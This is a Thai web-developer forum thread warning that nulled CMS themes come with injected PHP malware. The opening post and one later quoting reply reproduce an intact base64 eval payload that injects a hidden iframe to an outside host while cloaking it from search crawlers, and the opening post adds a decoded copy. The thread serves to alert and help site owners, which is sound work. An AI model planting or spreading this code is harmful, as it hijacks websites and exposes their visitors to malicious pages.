ThaiSEOBoard.com

พัฒนาเว็บไซต์ => CMS & Free Script => ข้อความที่เริ่มโดย: iczykung ที่ 08 ตุลาคม 2012, 17:24:12


หัวข้อ: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านก
เริ่มหัวข้อโดย: iczykung ที่ 08 ตุลาคม 2012, 17:24:12
**เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านการ Nulled หรือ cracked

ผมเจอมาแล้วครับ มันจะฝัง script malware แถมมาให้เราด้วยครับ  เช่น  เวลาคลิ๊กเข้าเว็บเราผ่านทาง google search จะวิ่งไปเว็บมันซะงั้น

สำหรับการแก้ปัญหาเบื้องต้น  :wanwan007: ง่ายๆ ครับ เปิด file php ทีล่ะไฟล์แล้ว search หา

โค๊ด:
eval(base64_decode   

ส่วนใหญ่มันจะอยู่ในลักษณะนี้นะครับ

โค๊ด:
<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gJzxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmV2YWwodW5lc2NhcGUoIiU2NCU2RiU2MyU3NSU2RCU2NSU2RSU3NCUyRSU3NyU3MiU2OSU3NCU2NSUyOCUyNyUzQyU2OSU2NiU3MiU2MSU2RCU2NSUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2MiU2OSU2MiU3QSU2RiU3MCU2QyUyRSU2MyU2RiU2RCUyRiU2OSU2RSUyRSU3MCU2OCU3MCUyMiUyMCU3NyU2OSU2NCU3NCU2OCUzRCUzMSUyMCU2OCU2NSU2OSU2NyU2OCU3NCUzRCUzMSUyMCU2NiU3MiU2MSU2RCU2NSU2MiU2RiU3MiU2NCU2NSU3MiUzRCUzMCUzRSUzQyUyRiU2OSU2NiU3MiU2MSU2RCU2NSUzRSUyNyUyOSUzQiIpKTwvc2NyaXB0Pic7ICAgICAgfSAgICAgIHJldHVybiAiIjsgICAgIH0gICAgfSAgICAgICAgaWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ICAgICBmdW5jdGlvbiBnemRlY29kZSgkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDKXsgICAgICAkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEPUBvcmQoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDMsMSkpOyAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9MTA7ICAgICAgJFJBM0Q1MkU1MkE0ODkzNkNERTBGNTM1NkJCMDg2NTJGMj0wOyAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmNCl7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9QHVucGFjaygndicsc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMTAsMikpOyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPSRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUJbMV07ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTIrJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQjsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY4KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMTYpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYyKXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MjsgICAgICB9ICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz1AZ3ppbmZsYXRlKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSk7ICAgICAgaWYoJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz09PUZBTFNFKXsgICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz0kUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDOyAgICAgIH0gICAgICByZXR1cm4gJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1MzsgICAgIH0gICAgfSAgICBmdW5jdGlvbiBtcm9iaCgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKXsgICAgIEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgICAgJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERT1nemRlY29kZSgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKTsgICAgICAgaWYocHJlZ19tYXRjaCgnL1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKSl7ICAgICAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sKCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpOyAgICAgfWVsc2V7ICAgICAgcmV0dXJuICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUuZ21sKCk7ICAgICB9ICAgIH0gICAgb2Jfc3RhcnQoJ21yb2JoJyk7ICAgfSAgfQ=="));?>


อะไรประมาณนี้ครับ  มันจะฝังอยู่ บรรทัดแรกของไฟล์ PHP ทุกไฟล์


เมื่อผมทำการถอดรหัสแล้ว  ปลาดุก.... :wanwan004: แอร้ยยย ปรากฏว่าเจอแบบนี้ครับ

โค๊ด:
if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){ $GLOBALS['mr_no']=1; 
if(!function_exists('mrobh')){ if(!function_exists('gml')){ function gml(){ if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){ return ''; } return ""; } } 
if(!function_exists('gzdecode')){ function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){ $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1)); $RBE4C4D037E939226F65812885A53DAD9=10; $RA3D52E52A48936CDE0F5356BB08652F2=0; 
if($R30B2AB8DC1496D06B230A71D8962AF5D&4){ $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2)); $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1]; $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB; } 
if($R30B2AB8DC1496D06B230A71D8962AF5D&8){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } 
if($R30B2AB8DC1496D06B230A71D8962AF5D&16){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } 
if($R30B2AB8DC1496D06B230A71D8962AF5D&2){ $RBE4C4D037E939226F65812885A53DAD9+=2; } $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9)); if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){ $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C; } return $R034AE2AB94F99CC81B389A1822DA3353; } } 
function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){ Header('Content-Encoding: none'); $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B); 
if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){ return preg_replace('/(\]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE); }else{ return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); } } ob_start('mrobh'); } }

เพื่อนๆ คงจะเดาออกนะครับว่ามันคืออะไร  :wanwan007:

น่ากลัวป่ะล่าาาาาาาาาาาาาา  :wanwan035:

หรือเพื่อนๆ สามารถตรวจสอบ Malware ในเว็บได้ที่
วิธีตรวจสอบ Malware ในเว็บไซต์ (http://iz-host.com/general/%E0%B8%84%E0%B8%A7%E0%B8%B2%E0%B8%A1%E0%B8%9B%E0%B8%A5%E0%B8%AD%E0%B8%94%E0%B8%A0%E0%B8%B1%E0%B8%A2/malware-%E0%B9%80%E0%B8%A7%E0%B9%87%E0%B8%9A%E0%B9%84%E0%B8%8B%E0%B8%95%E0%B9%8C/)


ปล.เพิ่มตัวอย่าง Code จริงๆ
ปล2.ขอบคุณสำหรับน้ำใจที่ทุกท่าน Thank ให้นะครับ  :wanwan012:

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านการ Nulled หรือ cracked
เริ่มหัวข้อโดย: lukplaz ที่ 08 ตุลาคม 2012, 17:26:17
ขอบคุณค่ะ มาเก็บความรู็ อิๆ  :wanwan020: :wanwan020:

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านการ Nulled หรือ cracked
เริ่มหัวข้อโดย: RichSoon ที่ 08 ตุลาคม 2012, 17:26:54

หาเจอแล้วทำไงต่อฮะ ลบทิ้งเหรอ?

 :wanwan017:

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านการ Nulled หรือ cracked
เริ่มหัวข้อโดย: หลานยายปริก ที่ 08 ตุลาคม 2012, 17:28:12
เห็นเจอกันหลายคนล่ะ บางคนถึงกับโดนแฮคเว็บก็มีนะครับ

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านการ Nulled หรือ cracked
เริ่มหัวข้อโดย: prinzekung ที่ 08 ตุลาคม 2012, 17:28:38
ลบครับแต่ทางที่ดีใช้ของถูกต้องดีกว่าครับ

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านการ Nulled หรือ cracked
เริ่มหัวข้อโดย: adslhispeed ที่ 08 ตุลาคม 2012, 17:34:06
 :wanwan035: น่ากลัวๆ ได้ของแถมด้วย

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านการ Nulled หรือ cracked
เริ่มหัวข้อโดย: iczykung ที่ 08 ตุลาคม 2012, 17:40:23
อ้างจาก: RichSoon ที่ 08 ตุลาคม 2012, 17:26:54

หาเจอแล้วทำไงต่อฮะ ลบทิ้งเหรอ?

 :wanwan017:

ลบโค้ดบรรทัดนั้นออกเลยครับ

อ้างจาก: adslhispeed ที่ 08 ตุลาคม 2012, 17:34:06
:wanwan035: น่ากลัวๆ ได้ของแถมด้วย

 :wanwan004:

อ้างจาก: prinzekung ที่ 08 ตุลาคม 2012, 17:28:38
ลบครับแต่ทางที่ดีใช้ของถูกต้องดีกว่าครับ
 

ใช่แล้วครับ แต่ผมขอลอง nulled พอใช้แล้วมันโอเคค่อยซื้อครับ

อ้างจาก: หลานยายปริก ที่ 08 ตุลาคม 2012, 17:28:12
เห็นเจอกันหลายคนล่ะ บางคนถึงกับโดนแฮคเว็บก็มีนะครับ

ใช่แล้วครับ  จริงๆ

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านการ Nulled หรือ cracked
เริ่มหัวข้อโดย: aeggarut ที่ 08 ตุลาคม 2012, 17:41:38
ระวังกันหน่อยนะครับ

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านการ Nulled หรือ cracked
เริ่มหัวข้อโดย: kankab13 ที่ 08 ตุลาคม 2012, 17:45:20
ผมเจอะมาหลายตัวอยูเลยพยายามทำ template ใช้เอง

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านการ Nulled หรือ cracked
เริ่มหัวข้อโดย: iczykung ที่ 08 ตุลาคม 2012, 17:45:54
อ้างจาก: aeggarut ที่ 08 ตุลาคม 2012, 17:41:38
ระวังกันหน่อยนะครับ

ผมลองใช้ shell script สแกนในโฮสรู้สึกว่าจะเจอกันเยอะ

ตามแก้ให้หมดเรียบร้อยแล้ว ^ ^  บริการฟรี

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านการ Nulled หรือ cracked
เริ่มหัวข้อโดย: iczykung ที่ 08 ตุลาคม 2012, 17:48:48
เพิ่มตัวอย่าง code แท้ๆ ที่ลูกค้าโดนๆ กันครับ

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านการ Nulled หรือ cracked
เริ่มหัวข้อโดย: BesTZeroPlus ที่ 08 ตุลาคม 2012, 17:57:45
ความรู้ครับ  :wanwan017:

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านการ Nulled หรือ cracked
เริ่มหัวข้อโดย: dhammarong ที่ 08 ตุลาคม 2012, 18:48:38
+1 ครับ ผมเจอกับตัวเองเลย  :P
มิน่าล่ะ ถาม hostgator support เขาก็บอกว่าไม่เหมือนกับโดนแฮค แต่ผมคลิกใน google แล้วมันไปเวบไหนก็ไม่รู้... :(
เข็ดจริงไม่เอา theme แจกฟรีแล้ว เช็คไม่เก่งครับ ไม่ใช่เทพ

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านการ Nulled หรือ cracked
เริ่มหัวข้อโดย: sleep ที่ 08 ตุลาคม 2012, 19:13:04
ส่วนมากก็จะหา เว็บโหลดจากแหล่งที่ดูน่าเชื่อถือหน่อย หรือไม่ก็จากผู้ผลิตเลย

บางคนก็โดนแฮกผ่านทางนี้ล่ะ คิดว่า

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านการ Nulled หรือ cracked
เริ่มหัวข้อโดย: momentum ที่ 08 ตุลาคม 2012, 19:16:27
ขอบคุณสำหรับสิ่งดีดีที่เอามาฝากกันนะครับ ^^

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านการ Nulled หรือ cracked
เริ่มหัวข้อโดย: top18753 ที่ 08 ตุลาคม 2012, 19:18:45
ใจนะ

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านการ Nulled หรือ cracked
เริ่มหัวข้อโดย: whosomeone ที่ 08 ตุลาคม 2012, 19:40:09
อ้างจาก: iczykung ที่ 08 ตุลาคม 2012, 17:45:54
อ้างจาก: aeggarut ที่ 08 ตุลาคม 2012, 17:41:38
ระวังกันหน่อยนะครับ

ผมลองใช้ shell script สแกนในโฮสรู้สึกว่าจะเจอกันเยอะ

ตามแก้ให้หมดเรียบร้อยแล้ว ^ ^  บริการฟรี

อุ้ย !! :wanwan008:

น่าไปสมัครเป้นลูกค้า เลย ผู้บริการ แบบเนี้ยะ!!  :-[

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านการ Nulled หรือ cracked
เริ่มหัวข้อโดย: iczykung ที่ 08 ตุลาคม 2012, 19:41:43
อ้างจาก: whosomeone ที่ 08 ตุลาคม 2012, 19:40:09
อ้างจาก: iczykung ที่ 08 ตุลาคม 2012, 17:45:54
อ้างจาก: aeggarut ที่ 08 ตุลาคม 2012, 17:41:38
ระวังกันหน่อยนะครับ

ผมลองใช้ shell script สแกนในโฮสรู้สึกว่าจะเจอกันเยอะ

ตามแก้ให้หมดเรียบร้อยแล้ว ^ ^  บริการฟรี

อุ้ย !! :wanwan008:

น่าไปสมัครเป้นลูกค้า เลย ผู้บริการ แบบเนี้ยะ!!  :-[

มาสิครับ ^ ^  ตามลายเซ็นเลย  แต่ว่าตอนนี้กำลัง MA เครื่องอยู่นะจ๊ะ ยังเข้าไม่ได้

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านการ Nulled หรือ cracked
เริ่มหัวข้อโดย: Ferrited ที่ 08 ตุลาคม 2012, 20:02:03
ว่ากันว่าของฟรีดีๆ ไม่มีในโลก มักมีของแถมมาเสมอ

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านการ Nulled หรือ cracked
เริ่มหัวข้อโดย: xvlnw.com ที่ 08 ตุลาคม 2012, 20:03:25
เป็นเรื่องปกติครับ
ทางที่ดี แนะนำให้ซื้อมาใช้ หรือไม่งั้นก็หาของฟรีใช้ครับ

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านการ Nulled หรือ cracked
เริ่มหัวข้อโดย: reactionkz ที่ 08 ตุลาคม 2012, 21:02:59
ขอบคุณคราบบที่มาเตือนแต่เหมือนจะโดนแล้ว :( :(

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านการ Nulled หรือ cracked
เริ่มหัวข้อโดย: system-4x ที่ 08 ตุลาคม 2012, 21:06:01
นี่มัน shell ดีๆนี่เอง

เหมือนกับได้เครื่องมาฟรีๆ  :wanwan004:


หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านการ Nulled หรือ cracked
เริ่มหัวข้อโดย: seonew ที่ 08 ตุลาคม 2012, 21:12:20
ฐานสแปมเมล์อย่างดีเลย เช็คดีๆ งานอาจงอกได้  ผมเลิกใช้ล่ะพวกธีม null ทั้งหลายแหล่  ไม่โดนแฮกก็โดนใช้ประโยชน์  :P

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านการ Nulled หรือ cracked
เริ่มหัวข้อโดย: wasantec ที่ 08 ตุลาคม 2012, 22:05:51
ความรู้  :wanwan020:

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านการ Nulled หรือ cracked
เริ่มหัวข้อโดย: jengseo01 ที่ 08 ตุลาคม 2012, 22:14:14
ขอบคุณครับ

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่าน
เริ่มหัวข้อโดย: Juststarted ที่ 08 ตุลาคม 2012, 22:41:37
 :wanwan015: :wanwan015: ผมก็เจอครับ(http://image.ohozaa.com/i/766/bfZlbj.png) ผมว่าจะเปลี่ยนใหม่ให้หมดเลย theme เนี้ย

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่าน
เริ่มหัวข้อโดย: iczykung ที่ 09 ตุลาคม 2012, 12:43:13
อ้างจาก: Juststarted ที่ 08 ตุลาคม 2012, 22:41:37
:wanwan015: :wanwan015: ผมก็เจอครับ([url]http://image.ohozaa.com/i/766/bfZlbj.png[/url]) ผมว่าจะเปลี่ยนใหม่ให้หมดเลย theme เนี้ย


งานงอกเลยครับอิอิ  สู้ๆ นะครับ

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านการ Nulled หรือ cracked
เริ่มหัวข้อโดย: hastyman ที่ 10 ตุลาคม 2012, 00:25:45
อ้างจาก: iczykung ที่ 08 ตุลาคม 2012, 17:24:12
**เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านการ Nulled หรือ cracked

ผมเจอมาแล้วครับ มันจะฝัง script malware แถมมาให้เราด้วยครับ  เช่น  เวลาคลิ๊กเข้าเว็บเราผ่านทาง google search จะวิ่งไปเว็บมันซะงั้น

สำหรับการแก้ปัญหาเบื้องต้น  :wanwan007: ง่ายๆ ครับ เปิด file php ทีล่ะไฟล์แล้ว search หา

โค๊ด:
eval(base64_decode  

ส่วนใหญ่มันจะอยู่ในลักษณะนี้นะครับ

โค๊ด:
<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gJzxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmV2YWwodW5lc2NhcGUoIiU2NCU2RiU2MyU3NSU2RCU2NSU2RSU3NCUyRSU3NyU3MiU2OSU3NCU2NSUyOCUyNyUzQyU2OSU2NiU3MiU2MSU2RCU2NSUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2MiU2OSU2MiU3QSU2RiU3MCU2QyUyRSU2MyU2RiU2RCUyRiU2OSU2RSUyRSU3MCU2OCU3MCUyMiUyMCU3NyU2OSU2NCU3NCU2OCUzRCUzMSUyMCU2OCU2NSU2OSU2NyU2OCU3NCUzRCUzMSUyMCU2NiU3MiU2MSU2RCU2NSU2MiU2RiU3MiU2NCU2NSU3MiUzRCUzMCUzRSUzQyUyRiU2OSU2NiU3MiU2MSU2RCU2NSUzRSUyNyUyOSUzQiIpKTwvc2NyaXB0Pic7ICAgICAgfSAgICAgIHJldHVybiAiIjsgICAgIH0gICAgfSAgICAgICAgaWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ICAgICBmdW5jdGlvbiBnemRlY29kZSgkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDKXsgICAgICAkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEPUBvcmQoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDMsMSkpOyAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9MTA7ICAgICAgJFJBM0Q1MkU1MkE0ODkzNkNERTBGNTM1NkJCMDg2NTJGMj0wOyAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmNCl7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9QHVucGFjaygndicsc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMTAsMikpOyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPSRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUJbMV07ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTIrJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQjsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY4KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMTYpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYyKXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MjsgICAgICB9ICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz1AZ3ppbmZsYXRlKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSk7ICAgICAgaWYoJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz09PUZBTFNFKXsgICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz0kUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDOyAgICAgIH0gICAgICByZXR1cm4gJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1MzsgICAgIH0gICAgfSAgICBmdW5jdGlvbiBtcm9iaCgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKXsgICAgIEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgICAgJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERT1nemRlY29kZSgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKTsgICAgICAgaWYocHJlZ19tYXRjaCgnL1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKSl7ICAgICAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sKCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpOyAgICAgfWVsc2V7ICAgICAgcmV0dXJuICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUuZ21sKCk7ICAgICB9ICAgIH0gICAgb2Jfc3RhcnQoJ21yb2JoJyk7ICAgfSAgfQ=="));?>


อะไรประมาณนี้ครับ  มันจะฝังอยู่ บรรทัดแรกของไฟล์ PHP ทุกไฟล์


เมื่อผมทำการถอดรหัสแล้ว  ปลาดุก.... :wanwan004: แอร้ยยย ปรากฏว่าเจอแบบนี้ครับ

โค๊ด:
if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){ $GLOBALS['mr_no']=1; 
if(!function_exists('mrobh')){ if(!function_exists('gml')){ function gml(){ if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){ return ''; } return ""; } } 
if(!function_exists('gzdecode')){ function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){ $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1)); $RBE4C4D037E939226F65812885A53DAD9=10; $RA3D52E52A48936CDE0F5356BB08652F2=0; 
